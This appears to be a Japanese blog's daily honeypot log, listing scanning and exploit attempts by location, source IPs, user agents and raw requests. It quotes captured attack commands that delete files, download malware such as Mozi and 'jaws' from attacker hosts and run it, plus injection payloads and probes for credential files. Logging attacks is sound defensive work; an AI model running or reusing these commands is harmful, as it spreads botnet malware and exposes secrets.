2022/08/14 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/08/14分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 159.223.13.188/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget synss.cf/jaws;
sh /tmp/jaws

Location:US

D-link製品の脆弱性を狙うアクセス
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://77.73.131.122/bins/aqua.mpsl;
sh /tmp/aqua.mpsl

cd /tmp;
rm -rf *;
wget synss.cf/jaws;
sh /tmp/jaws

Location:UK

D-link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget synss.cf/jaws;
sh /tmp/jaws

Location:SG

JBossの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：245 (前日比：23)
US：総アクセス数：258 (前日比：194)
UK：総アクセス数：42 (前日比：-256)
SG：総アクセス数：72 (前日比：-3)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.9.58.213	United States
2	20.78.32.254	United States
1	20.84.53.67	United States
1	20.150.210.254	United States
29	35.89.31.124	United States
1	45.83.67.184	Germany
2	52.206.232.106	United States
131	54.168.202.47	United States
1	60.173.104.173	China
1	64.62.197.78	United States
1	83.69.8.12	Russia
2	89.250.82.219	Kazakhstan
1	95.161.131.235	Antigua and Barbuda
16	95.214.235.205	Ukraine
2	107.175.21.30	United States
2	107.182.129.239	United States
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	120.86.255.244	China
1	129.151.155.76	United States
9	135.125.217.54	France
7	135.125.246.189	France
4	139.162.197.6	Netherlands
1	141.98.9.13	Lithuania
2	143.198.174.30	United States
1	143.244.37.155	United Kingdom
1	172.104.242.173	United States
1	175.107.1.138	Pakistan
15	185.7.214.117	Hong Kong
1	187.232.42.64	Mexico
1	192.241.207.186	United States
1	205.210.31.130	United States
1	212.23.222.167	Poland

UserAgent一覧

件数	UserAgent
7	`-`
5	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
69	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 zgrab/0.x`
11	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`curl/7.82.0`
123	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`MGLNDD_18.179.20.5_80\n`
1		`\x03`
2		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/.awsv2/credentials`	HTTP/1.1
44	GET	`/.env`	HTTP/1.1
1	GET	`/.sesv2/credentials`	HTTP/1.1
1	GET	`//.aws/credentials`	HTTP/1.1
1	GET	`//.env.bak`	HTTP/1.1
1	GET	`//.git/config`	HTTP/1.1
1	GET	`//Administrator/info.php`	HTTP/1.1
1	GET	`//Administrator/infophp.php`	HTTP/1.1
1	GET	`//Administrator/phpinfo.php`	HTTP/1.1
1	GET	`//Administrator/phpinfo`	HTTP/1.1
1	GET	`//_profiler/phpinfo/info.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo`	HTTP/1.1
1	GET	`//`	HTTP/1.1
1	GET	`//admin/info.php`	HTTP/1.1
1	GET	`//admin/infophp.php`	HTTP/1.1
1	GET	`//admin/phpinfo.html`	HTTP/1.1
1	GET	`//admin/phpinfo.php`	HTTP/1.1
1	GET	`//admin/phpinfo`	HTTP/1.1
1	GET	`//admin_php[.]php/infophp.php`	HTTP/1.1
1	GET	`//administrator/info.php`	HTTP/1.1
1	GET	`//administrator/infophp`	HTTP/1.1
1	GET	`//administrator/phpinfo.php`	HTTP/1.1
1	GET	`//administrator/phpinfo`	HTTP/1.1
1	GET	`//apache/i.php`	HTTP/1.1
1	GET	`//apache/info.php`	HTTP/1.1
1	GET	`//apache/phpinfo.php`	HTTP/1.1
1	GET	`//apache2[.]php`	HTTP/1.1
1	GET	`//apache[.]php`	HTTP/1.1
1	GET	`//aws[.]yml`	HTTP/1.1
1	GET	`//config[.]js`	HTTP/1.1
1	GET	`//console/info.php`	HTTP/1.1
1	GET	`//console/infophp`	HTTP/1.1
1	GET	`//console/phpinfo.html`	HTTP/1.1
1	GET	`//console/phpinfo.php`	HTTP/1.1
1	GET	`//console/phpinfo`	HTTP/1.1
1	GET	`//dashboard/i.php`	HTTP/1.1
1	GET	`//dashboard/info.php`	HTTP/1.1
1	GET	`//dashboard/infophp.php`	HTTP/1.1
2	GET	`//dashboard/phpinfo.php`	HTTP/1.1
1	GET	`//dashboard/phpinfo`	HTTP/1.1
1	GET	`//dashboard/test.php`	HTTP/1.1
1	GET	`//debug/default/view?panel=config`	HTTP/1.1
1	GET	`//dep[.]php`	HTTP/1.1
1	GET	`//deploy[.]php`	HTTP/1.1
2	GET	`//dev[.]php`	HTTP/1.1
1	GET	`//developer[.]php`	HTTP/1.1
1	GET	`//devs[.]php`	HTTP/1.1
1	GET	`//env/info.php`	HTTP/1.1
1	GET	`//env/infophp`	HTTP/1.1
1	GET	`//env/phpinfo.php`	HTTP/1.1
1	GET	`//env/phpinfo`	HTTP/1.1
1	GET	`//foo[.]php`	HTTP/1.1
1	GET	`//forum/index.php`	HTTP/1.1
1	GET	`//forum/info.php`	HTTP/1.1
1	GET	`//forum/phpinfo.php`	HTTP/1.1
1	GET	`//forum/phpinfo`	HTTP/1.1
1	GET	`//frontend_dev[.]php/$`	HTTP/1.1
1	GET	`//i[.]php`	HTTP/1.1
1	GET	`//in[.]php`	HTTP/1.1
1	GET	`//index1[.]php`	HTTP/1.1
1	GET	`//index[.]php`	HTTP/1.1
1	GET	`//inf[.]php`	HTTP/1.1
1	GET	`//info1[.]php`	HTTP/1.1
1	GET	`//info2[.]php`	HTTP/1.1
1	GET	`//info3[.]php`	HTTP/1.1
1	GET	`//info4[.]php`	HTTP/1.1
2	GET	`//info[.]php`	HTTP/1.1
1	GET	`//infophp/index.php`	HTTP/1.1
1	GET	`//infophp/info.php`	HTTP/1.1
1	GET	`//infophp/phpinfo.php`	HTTP/1.1
1	GET	`//infophp/phpinfo`	HTTP/1.1
1	GET	`//infophp/testphp.php`	HTTP/1.1
1	GET	`//infophp[.]php`	HTTP/1.1
1	GET	`//infos[.]php`	HTTP/1.1
1	GET	`//ini[.]php`	HTTP/1.1
1	GET	`//o[.]php`	HTTP/1.1
1	GET	`//ocp[.]php`	HTTP/1.1
1	GET	`//p[.]php`	HTTP/1.1
1	GET	`//php-info.php`	HTTP/1.1
1	GET	`//php/phpinfo.php`	HTTP/1.1
1	GET	`//php1[.]php`	HTTP/1.1
1	GET	`//php[.]php`	HTTP/1.1
1	GET	`//php_info[.]php`	HTTP/1.1
1	GET	`//phpconfigure/index.php`	HTTP/1.1
1	GET	`//phpconfigure/info.php`	HTTP/1.1
1	GET	`//phpconfigure/phpinfo.php`	HTTP/1.1
1	GET	`//phpconfigure/phpinfo`	HTTP/1.1
1	GET	`//phpinfo/info.php`	HTTP/1.1
1	GET	`//phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpinfo1[.]php`	HTTP/1.1
1	GET	`//phpinfo2[.]php`	HTTP/1.1
1	GET	`//phpinfo3[.]php`	HTTP/1.1
1	GET	`//phpinfo4[.]php`	HTTP/1.1
2	GET	`//phpinfo[.]html`	HTTP/1.1
2	GET	`//phpinfo[.]php`	HTTP/1.1
1	GET	`//phpinfo[.]txt`	HTTP/1.1
1	GET	`//phpinfo`	HTTP/1.1
1	GET	`//phpinfodev[.]php`	HTTP/1.1
1	GET	`//phpinfos[.]php`	HTTP/1.1
1	GET	`//phpsysinfo/info.php`	HTTP/1.1
1	GET	`//phpsysinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpsysinfo/phpsysinfo.php`	HTTP/1.1
1	GET	`//phpsysinfo[.]php`	HTTP/1.1
1	GET	`//phpsysinfo`	HTTP/1.1
1	GET	`//phptest[.]php`	HTTP/1.1
1	GET	`//pinfo[.]php`	HTTP/1.1
1	GET	`//rest[.]php`	HTTP/1.1
1	GET	`//root/info.php`	HTTP/1.1
1	GET	`//root/infophp`	HTTP/1.1
1	GET	`//root/phpinfo.html`	HTTP/1.1
1	GET	`//root/phpinfo.php`	HTTP/1.1
1	GET	`//root/phpinfo`	HTTP/1.1
1	GET	`//scripts/index.php`	HTTP/1.1
1	GET	`//scripts/info.php`	HTTP/1.1
1	GET	`//scripts/phpinfo.php`	HTTP/1.1
1	GET	`//scripts/phpinfo`	HTTP/1.1
1	GET	`//test0[.]php`	HTTP/1.1
1	GET	`//test1/index.php`	HTTP/1.1
1	GET	`//test1[.]php`	HTTP/1.1
1	GET	`//test1`	HTTP/1.1
1	GET	`//test2[.]php`	HTTP/1.1
1	GET	`//test3[.]php`	HTTP/1.1
1	GET	`//test4[.]php`	HTTP/1.1
1	GET	`//test[.]php`	HTTP/1.1
1	GET	`//testphp[.]php`	HTTP/1.1
1	GET	`//token[.]php`	HTTP/1.1
1	GET	`//tz[.]php`	HTTP/1.1
1	GET	`//web[.]php`	HTTP/1.1
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?p=1`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/PSIA/index`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo.php`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.js`	HTTP/1.1
1	GET	`/api.js`	HTTP/1.1
1	GET	`/aws-key.yml`	HTTP/1.1
1	GET	`/aws.js`	HTTP/1.1
1	GET	`/aws/credentials`	HTTP/1.1
1	GET	`/aws_config.js`	HTTP/1.1
1	GET	`/awsv2/credentials`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
2	GET	`/console/`	HTTP/1.1
1	GET	`/credentials/.aws`	HTTP/1.1
1	GET	`/credentials/aws`	HTTP/1.1
1	GET	`/env.dev.js`	HTTP/1.1
1	GET	`/env.development.js`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
1	GET	`/env.json`	HTTP/1.1
1	GET	`/env.prod.js`	HTTP/1.1
1	GET	`/env.production.js`	HTTP/1.1
1	GET	`/env.test.js`	HTTP/1.1
1	GET	`/environments.json`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info-admin.php`	HTTP/1.1
1	GET	`/info-php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/phps.php`	HTTP/1.1
1	GET	`/secret.js`	HTTP/1.1
1	GET	`/server.js`	HTTP/1.1
1	GET	`/ses/credentials`	HTTP/1.1
1	GET	`/sesv2/credentials`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+159[.]223[.]13[.]188/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synss[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/upload.js`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-includes/css/buttons.css`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/onvif/index`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/xmlrpc.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.144.190.233	Italy
1	39.34.244.150	Pakistan
8	51.79.29.48	Canada
119	62.227.198.72	Germany
1	79.55.30.104	Italy
1	107.182.129.239	United States
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	111.76.234.45	China
1	141.98.9.13	Lithuania
2	143.198.174.30	United States
1	147.182.224.91	United States
1	162.142.125.121	United States
1	162.142.125.212	United States
1	181.214.206.161	United States
1	183.136.225.35	China
13	185.7.214.117	Hong Kong
7	185.254.196.223	Ukraine
1	192.200.158.225	United States
2	192.227.144.49	United States
1	192.241.205.81	United States
2	193.56.29.26	United Kingdom
1	195.178.120.19	Bulgaria
84	198.204.245.98	United States
1	202.91.87.200	India
1	209.141.51.222	United States
1	223.16.145.24	Hong Kong

UserAgent一覧

件数	UserAgent
7	`-`
4	`Hello, world`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36`
119	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
71	`wp_is_mobile`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
2		`\x16\x03\x01\x01D\x01`
22	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/ALFA_DATA`	HTTP/1.1
1	GET	`/.well-known/alfacgiapi`	HTTP/1.1
1	GET	`/.well-known/cgialfa`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/1index.php`	HTTP/1.1
1	GET	`/1phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/2phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ALFA_DATA`	HTTP/1.1
1	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA/index.php?lang=en`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpmyadmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/a.php`	HTTP/1.1
1	GET	`/about.php`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/controller/extension/extension/ALFA_DATA`	HTTP/1.1
1	GET	`/admin/controller/extension/extension/alfacgiapi`	HTTP/1.1
1	GET	`/admin/controller/extension/extension/cgialfa`	HTTP/1.1
1	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sysadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/PMA/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
1	GET	`/alfa.php`	HTTP/1.1
1	GET	`/alfacgiapi`	HTTP/1.1
1	GET	`/archives.php`	HTTP/1.1
1	GET	`/beence.php`	HTTP/1.1
1	GET	`/cgialfa`	HTTP/1.1
1	GET	`/config.bak.php`	HTTP/1.1
1	GET	`/config.php`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/database/index.php?lang=en`	HTTP/1.1
1	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
1	GET	`/db/index.php?lang=en`	HTTP/1.1
1	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/db/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/db/websql/index.php?lang=en`	HTTP/1.1
1	GET	`/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/defau11.php`	HTTP/1.1
1	GET	`/defau1t.php`	HTTP/1.1
1	GET	`/doc.php`	HTTP/1.1
1	GET	`/error.php?phpshells`	HTTP/1.1
1	GET	`/export.php`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/gank.php.PhP`	HTTP/1.1
1	GET	`/index.php?3x=3x`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/legion.php`	HTTP/1.1
1	GET	`/media-admin.php`	HTTP/1.1
1	GET	`/moduless.php`	HTTP/1.1
1	GET	`/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/pMA/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/web/index.php?lang=en`	HTTP/1.1
1	GET	`/mysqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/olux.php`	HTTP/1.1
1	GET	`/php-my-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.0/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.2.0/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5.1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5.2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2011/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2012/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2013/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2014/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2016/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2017/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2019/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2020/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2021/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2022/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/phppma/index.php?lang=en`	HTTP/1.1
1	GET	`/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/program/index.php?lang=en`	HTTP/1.1
1	GET	`/radio.php`	HTTP/1.1
1	GET	`/s_e.php`	HTTP/1.1
1	GET	`/s_ne.php`	HTTP/1.1
1	GET	`/shell.php`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//77[.]73[.]131[.]122/bins/aqua.mpsl;sh+/tmp/aqua.mpsl`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synss[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shells.php`	HTTP/1.1
1	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sites/default/files/ALFA_DATA`	HTTP/1.1
1	GET	`/sites/default/files/alfacgiapi`	HTTP/1.1
1	GET	`/sites/default/files/cgialfa`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sql-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sql/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sqlweb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/websql/index.php?lang=en`	HTTP/1.1
1	GET	`/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/style.php`	HTTP/1.1
1	GET	`/system_log.php?bala=up`	HTTP/1.1
1	GET	`/templates/beez3/ALFA_DATA`	HTTP/1.1
1	GET	`/templates/beez3/alfacgiapi`	HTTP/1.1
1	GET	`/templates/beez3/cgialfa`	HTTP/1.1
1	GET	`/templates/beez3/index.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/up.php`	HTTP/1.1
1	GET	`/upload.php`	HTTP/1.1
1	GET	`/ups.php`	HTTP/1.1
